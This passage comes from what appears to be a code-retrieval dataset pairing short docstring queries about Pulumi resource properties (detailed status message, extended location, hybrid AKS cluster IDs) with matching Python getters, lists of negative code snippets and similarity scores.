"def status(self):\n return dict(price_data=self.price_data,\n profit_data=self.profit_data,\n next_network=self.next_network,\n current_network=self.current_network)",
"def GetStatus(self):\r\n return self.status",
"def peer_status(self):\n cmdlist = shlex.split(\"gluster peer status\")\n output = subprocess.Popen(cmdlist, stdout=subprocess.PIPE)\n stdout = output.stdout.read()\n print json.dumps({\n \"output\": stdout\n })",
"def model_status():\n return juju.CLIENT.Client(request=\"FullStatus\")",
"def fetch_status():\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((GEARMAND_HOST, GEARMAND_PORT))\n log_verbose('Connected to Gearmand at %s:%s' % (GEARMAND_HOST, GEARMAND_PORT))\n except socket.error, e:\n collectd.error('gearmand_info plugin: Error connecting to %s:%d - %r'\n % (GEARMAND_HOST, GEARMAND_PORT, e))\n return None\n fp = s.makefile('r')\n log_verbose('Sending info command')\n s.sendall('status\\r\\n')\n\n status = {}\n while True:\n data = fp.readline().strip()\n log_verbose('Received data: %r' % data)\n if not data or data == '.':\n break\n function, total, running, available_workers = data.split('\\t')\n status[function] = {\n 'total': total,\n 'running': running,\n 'available_workers': available_workers}\n\n s.close()\n return status",
"def display_status(self):\n connected = _check_connection()\n status = (\n f'WiFi: {\"connected\" if connected else \"disconnected\"}\\n'\n f'MQTT host: {self.mqtt.host if self.mqtt else \"N/A\"}\\n'\n f'Packets sent: {self.mqtt.n_sent if self.mqtt else 0}\\n'\n f'Uptime: {self.uptime()}'\n )\n self.display.draw_text_box(status, bg_color=BG_CYAN if connected else BG_RED)",
"def status(self) -> 'outputs.ConnectionStatusResponse':\n return pulumi.get(self, \"status\")",
"def status(self):\n return self._call_txtrader_api('status', {})",
"def state(self):\n return self.device.status(station=self.station_number)",
"def getStatus(self):\r\n return self.controller.getStatus()",
"def status(self):\n return self.log.status",
"def status(self):\n return self.state",
"def status(self):\n return self.m.status"
] | [
"0.7574918",
"0.7074409",
"0.70706975",
"0.6863271",
"0.6652941",
"0.6643125",
"0.6537197",
"0.6532778",
"0.6486455",
"0.64751476",
"0.6474038",
"0.6464015",
"0.6456763",
"0.64546263",
"0.6443891",
"0.64406186",
"0.6434034",
"0.6434034",
"0.6425376",
"0.64220667",
"0.63576347",
"0.63576347",
"0.6343767",
"0.6305158",
"0.62883943",
"0.62774414",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.626596",
"0.62488097",
"0.6239048",
"0.6235981",
"0.6231515",
"0.6227282",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6225461",
"0.6214133",
"0.6203906",
"0.6201898",
"0.6199496",
"0.6183484",
"0.6164759",
"0.61566633",
"0.61487436",
"0.6143894",
"0.6138211",
"0.6136251",
"0.61275274",
"0.61184925",
"0.6109839",
"0.6105358",
"0.6084382",
"0.60680014",
"0.60563886",
"0.60375994",
"0.6035632",
"0.60331523",
"0.60323435",
"0.6030377",
"0.60302514"
] | 0.71242344 | 2 |
The descriptive message about the current detailed status. | def detailed_status_message(self) -> pulumi.Output[str]:
return pulumi.get(self, "detailed_status_message") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def detailed_status_message(self) -> str:\n return pulumi.get(self, \"detailed_status_message\")",
"def detailed_status(self) -> str:\n return pulumi.get(self, \"detailed_status\")",
"def status_message(self) -> str:\n return pulumi.get(self, \"status_message\")",
"def detailed_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status\")",
"def detailed_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"detailed_status\")",
"def status_message(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status_message\")",
"def status_detail(self):\n return self._status_detail",
"def _get_status(self):\n held_msg=\"\"\n return u'%s%s' % (self.get_status_display(), held_msg)",
"def status_message(self) -> Optional[str]:\n return pulumi.get(self, \"status_message\")",
"def get_status(self):\n return self.msg",
"def __str__(self):\n # return status text.\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def __str__(self):\n return self.status_text",
"def report_state(self):\n text = \"Status: %d\"%self.state.num;\n if self.state.msg !=\"\":\n text += \", Msg: %s\"%self.state.msg;\n return text;",
"def display_status(self) -> str:\n return pulumi.get(self, \"display_status\")",
"def _get_status(self):\n return u'%s' % (self.get_status_display())",
"def detail(self):\n return self.status[\"health\"][\"detail\"]",
"def __str__(self):\n\n return self.status_text",
"def status_msg(self, context):\n msg = self._get_base_message(self.GET_STATUS)\n self._add_thread(msg)\n self._add_relationship(msg, self.for_relationship)\n return msg",
"def _print_status(self):",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status(self) -> str:\n return pulumi.get(self, \"status\")",
"def status_reason(self):\n return self.status.split()[2]",
"def summary(self):\n res = \", \".join(\n elem[\"summary\"] for elem in self.status[\"health\"][\"summary\"]\n )\n if res:\n return res\n elif self.detail:\n return self.detail[0]\n return \"\"",
"def status_msg(self, msg):\n\n\t\tprint(\"function not supported yet\")",
"def format_status_info(self, status_info):\n lines = self._status_info_lines(status_info)\n if lines:\n return '\\n'.join(lines)\n else:\n return f'{self.name}: No status available'",
"def standard_status():\n errors, warnings, infos = THE_LOGGER.status()\n info(errors, \"errors\")\n info(warnings, \"warnings\")\n info(infos, \"infos\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def status(self):\n return ''",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def status(self) -> str:\n return self._status",
"def summary(self):\r\n return '%s%s: %s%s %s%s' % (BLUE, self.title,\r\n GREEN, self.description,\r\n NORMAL, self.link)",
"def status(self):\n if self.error_code:\n msg = self.error_code\n else:\n msg = 'C{cycle},P{seen},{progress:.0f}%'.format(\n cycle=self.cycle,\n seen=self.seen_per_cycle,\n progress=(self.step / float(self.count_points) * 100)\n )\n return '[W{worker_no}: {msg}]'.format(\n worker_no=self.worker_no,\n msg=msg\n )",
"def __status(self, *args):\n return \"status\"",
"def get_status_string(self, instance):\n return instance.get_status_string()",
"def report_info(self):\n report_values = ['test_description', 'expected_status']\n msg_data = ['']\n for report_value in report_values:\n msg_data.append(\"%s: %s\" %(report_value, getattr(self,report_value)))\n msg_data.append('')\n return '\\n'.join(msg_data)",
"def status(self):\n if self.to_phone:\n phone = '(%s) %s - %s' % (self.to_phone[:3], self.to_phone[3:6], self.to_phone[6:])\n else:\n phone = ''\n\n name = self.to_name if self.to_name else ''\n\n return ' poll in %ds | %s | %s ' % (self.step, name, phone)",
"def __str__(self):\n\n return self.status_text",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")",
"def display_status(self):\n time = float2str(self.scheduler.time, '10.2f')\n tx = float2str(self.tx_total, '10g')\n rx = float2str(self.rx_total, '10g')\n dup = float2str(self.dup_total, '10g')\n uniq_total = float2str(self.uniq_total, '10g')\n delivered_total = float2str(self.delivered_total, '10g')\n uniq_delivered_total = float2str(self.uniq_delivered_total, '10g')\n print(\n 'define status_l text Time:{},____TX:{},____RX:{},____DUP:{},____Delivered:{}__/__{},____Arrived:{} 14 white 0.5 0.05'\n .format(time, tx, rx, dup, uniq_delivered_total, uniq_total,\n delivered_total))",
"def index_status_description(self):\n if (self.index_status == 3):\n return 'approved'\n if (self.index_status == 0):\n return 'no data'\n if (self.index_status == 1):\n return 'reserved'\n if (self.index_status == 2):\n return 'pending'",
"def get_status(self):\n if self.cancelled:\n return \"Cancelled\"\n elif self.is_active():\n s = \"Active\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n elif self.is_complete():\n s = \"Complete\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n elif self.is_confirmed():\n s = \"Confirmed\"\n if self.is_paid():\n return \"{0} - Paid\".format(s)\n else:\n return \"{0} - Unpaid\".format(s)\n else:\n return \"Unknown - contact staff\"",
"def __str__(self):\n error_message = \"({0})\\n\"\\\n \"Reason: {1}\\n\".format(self.status, self.reason)\n if self.headers:\n error_message += \"HTTP response headers: {0}\\n\".format(self.headers)\n\n if self.body:\n error_message += \"HTTP response body: {0}\\n\".format(self.body)\n\n return error_message",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")",
"def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")"
] | [
"0.89667886",
"0.8075508",
"0.79899865",
"0.78511816",
"0.78511816",
"0.7514408",
"0.7487773",
"0.74315125",
"0.74046624",
"0.71724355",
"0.7140361",
"0.71236587",
"0.71236587",
"0.71236587",
"0.7112143",
"0.710846",
"0.710131",
"0.70546633",
"0.6989946",
"0.69429255",
"0.6897839",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6879917",
"0.6871012",
"0.6836113",
"0.6813361",
"0.67387164",
"0.67261624",
"0.67177427",
"0.67177427",
"0.67177427",
"0.67177427",
"0.6692822",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6686273",
"0.6681855",
"0.66778505",
"0.6665873",
"0.6631201",
"0.6628522",
"0.6623891",
"0.6614947",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6609931",
"0.6599627",
"0.65775716",
"0.6574345",
"0.6548519",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594",
"0.65439594"
] | 0.87084526 | 2 |
The extended location of the cluster associated with the resource. | def extended_location(self) -> pulumi.Output['outputs.ExtendedLocationResponse']:
return pulumi.get(self, "extended_location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> pulumi.Input['ExtendedLocationArgs']:\n return pulumi.get(self, \"extended_location\")",
"def set_up_extended_location(self, mc: ManagedCluster) -> ManagedCluster:\n self._ensure_mc(mc)\n\n edge_zone = self.context.get_edge_zone()\n if edge_zone:\n mc.extended_location = self.models.ExtendedLocation(\n name=edge_zone,\n type=self.models.ExtendedLocationTypes.EDGE_ZONE\n )\n return mc",
"def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:\n return pulumi.get(self, \"extended_location\")",
"def location(self) -> str:\n return self.metadata.location",
"def resource_type(self):\n return 'cluster'",
"def cluster(self):\n return self._cluster",
"def cluster(self):\n return self._cluster",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def _course_location(self):\r\n return \"location:{org}+{number}+{run}+course+{run}\".format(**self._course_dict)",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def cluster_name(self):\n return self.name",
"def location(self):\r\n return self._get('location', {})",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def location(self) -> str:\n return self._location",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def get_default_alt_loc(self):\n return self.default_alt_loc",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def default_secondary_location(self) -> str:\n return pulumi.get(self, \"default_secondary_location\")",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def location(self) -> object:\n return self._location",
"def cluster_name(self):\n return self._data['cluster_name']",
"def Lokation(self):\n return self.getMylocation()",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def _cluster_scoped_iam_path(self):\n return f\"{IAM_ROLE_PATH}{self.stack_name}/\"",
"def location(self) -> Object:\n return self._location",
"def get_cluster_entry(self):\n\n cert_data = self.cluster_description.get(\"certificateAuthority\", {}).get(\"data\", \"\")\n endpoint = self.cluster_description.get(\"endpoint\")\n arn = self.cluster_description.get(\"arn\")\n\n return OrderedDict([\n (\"cluster\", OrderedDict([\n (\"certificate-authority-data\", cert_data),\n (\"server\", endpoint)\n ])),\n (\"name\", arn)\n ])",
"def get_location(self):\r\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def cluster_description(self):\n if self._cluster_description is None:\n if self._parsed_globals is None:\n client = self._session.create_client(\"eks\")\n else:\n client = self._session.create_client(\n \"eks\",\n region_name=self._parsed_globals.region,\n endpoint_url=self._parsed_globals.endpoint_url,\n verify=self._parsed_globals.verify_ssl\n )\n full_description = client.describe_cluster(name=self._cluster_name)\n self._cluster_description = full_description[\"cluster\"]\n\n if \"status\" not in self._cluster_description:\n raise EKSClusterError(\"Cluster not found\")\n if self._cluster_description[\"status\"] not in [\"ACTIVE\", \"UPDATING\"]:\n raise EKSClusterError(\"Cluster status is {0}\".format(\n self._cluster_description[\"status\"]\n ))\n\n return self._cluster_description",
"def get_location(self):\n\t\treturn self.location",
"def __str__(self):\n return \"Cluster\"",
"def get_location(self):\r\n return None",
"def locate(self):\n return utils.get_object(\"crds\", self.observatory, \"locate\")",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self):\n return self.location",
"def locations(self):\r\n return resource.Location(self)",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def cluster_id(self):\n return self._cluster_id",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"location\")",
"def get_cluster_info(self) -> Dict[str, Any]:\n pass",
"def location(self):\r\n\r\n raise SemanticError(\"Location not implemented\");",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_cluster_name(cls):\n\n mid = Machineid()\n if mid.is_sps_cluster:\n return cls.SPS\n if mid.is_spts_cluster:\n return cls.SPTS\n if mid.is_mdfl_cluster:\n return cls.MDFL\n\n return cls.LOCAL",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def management_cluster(self) -> pulumi.Output['outputs.PrivateCloudManagementCluster']:\n return pulumi.get(self, \"management_cluster\")",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def getLocation(self):\n return self._Location",
"def location_arn(self) -> Optional[str]:\n return pulumi.get(self, \"location_arn\")",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")"
] | [
"0.6552111",
"0.6507004",
"0.6507004",
"0.6427688",
"0.64267975",
"0.64260936",
"0.64260936",
"0.63151413",
"0.6296761",
"0.6123441",
"0.6123441",
"0.595561",
"0.58933264",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5883953",
"0.5868833",
"0.5868833",
"0.5868833",
"0.5862934",
"0.5843456",
"0.5832257",
"0.5774442",
"0.5670738",
"0.565388",
"0.5642064",
"0.5642064",
"0.5637912",
"0.5634472",
"0.5634472",
"0.5632768",
"0.56296843",
"0.56284314",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5607931",
"0.5592737",
"0.5577344",
"0.5573659",
"0.55710924",
"0.5565424",
"0.55634725",
"0.5558331",
"0.55544007",
"0.55512756",
"0.55403364",
"0.5537851",
"0.55323946",
"0.5517471",
"0.55100954",
"0.5498214",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54934365",
"0.54803187",
"0.5467255",
"0.5461056",
"0.5451514",
"0.5442272",
"0.5442272",
"0.5442272",
"0.5434703",
"0.54240304",
"0.541763",
"0.53864765",
"0.5384029",
"0.53797865",
"0.53771985",
"0.5368183",
"0.5366416",
"0.5366416",
"0.5366416"
] | 0.67308724 | 1 |
Field Deprecated. These fields will be empty/omitted. The list of Hybrid AKS cluster resource IDs that are associated with this L3 network. | def hybrid_aks_clusters_associated_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "hybrid_aks_clusters_associated_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def gateway_cluster_id_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"gateway_cluster_id_lists\")",
"def cluster_ids(self):\n return self.model.cluster_ids",
"def _get_cluster_list(self):\n return self.__cluster_list",
"def network_ids(self):\n return self._network_ids",
"def get_all_cluster_ids(self) -> Set[str]:\n return {v for v in self._clusters.values() if v}",
"def orig_cluster_id(self):\n if self.old_cluster_name is None:\n raise RuntimeError('old_cluster_name is not set')\n return self.fuel_web.client.get_cluster_id(self.old_cluster_name)",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def clusters(self,project_id=os.environ.get(\"ATLAS_PROJECT\")):\n project_id = project_id if project_id != '' else self.__project_id\n return self.get('{}/groups/{}/clusters'.format(ApiVersion.A1.value,project_id))",
"def resource_type(self):\n return 'cluster'",
"def list_cluster_response():\n return {\n \"clusters\": [\n EXAMPLE_NAME\n ]\n }",
"def cluster_list():\n request_debug(r, logger)\n json_body = r.get_json(force=True, silent=True) or {}\n result = cluster_handler.list(filter_data=json_body)\n response_ok[\"data\"] = result\n return jsonify(response_ok), CODE_OK",
"def network_fabric_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"network_fabric_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def associated_resource_ids(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"associated_resource_ids\")",
"def clusters(self):\n\t\tif self._record is None:\n\t\t return []\n\t\tclusters = [i for i in self._record.features if i.type == 'cluster']\n\t\treturn clusters",
"def clusters(self):\n raise NotImplementedError",
"def test_list_cluster_network(self):\n pass",
"def node_ids(self):\n return [self.node_id]",
"def get_clusters(self):\r\n\r\n return self.__clusters",
"def get_cluster_by_id(self, c_id: str) -> List[str]:\n return [k for k, v in self._clusters.items() if v == c_id]",
"def cluster_id(self):\n return self._cluster_id",
"def list_namespaced_cluster_network(self, **kwargs):\n\n all_params = ['pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method list_namespaced_cluster_network\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/oapi/v1/clusternetworks'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n if 'label_selector' in params:\n query_params['labelSelector'] = params['label_selector']\n if 'field_selector' in params:\n query_params['fieldSelector'] = params['field_selector']\n if 'watch' in params:\n query_params['watch'] = params['watch']\n if 'resource_version' in params:\n query_params['resourceVersion'] = params['resource_version']\n if 'timeout_seconds' in params:\n query_params['timeoutSeconds'] = params['timeout_seconds']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='V1ClusterNetworkList',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"def get_clusters(self):\n fields = ['name', ]\n return self.get_data(\"clusters\", fields)",
"def get_clusters() -> List[List[str]]:\n all_users = get_user_ids()\n pass",
"def get_labeled_ids(self):\n with open(DATASET_LABELED_IDS) as file:\n ids = file.readlines()\n ids = [id.strip() for id in ids]\n return ids",
"def course_id_list(self):\r\n\r\n return self.q(css='article.course').attrs('id')",
"def clusters(self):\n return self._clusters",
"def security_list_ids(self):\n return self._security_list_ids",
"def network_interface_ids(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"network_interface_ids\")",
"def Clusters(self):\n return",
"def cluster_identifier(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cluster_identifier\")",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cluster_id\")",
"def get_clusters(self):\n return self._clusters",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cluster_id\")",
"def get_clusters(self):\n\n return self.__clusters",
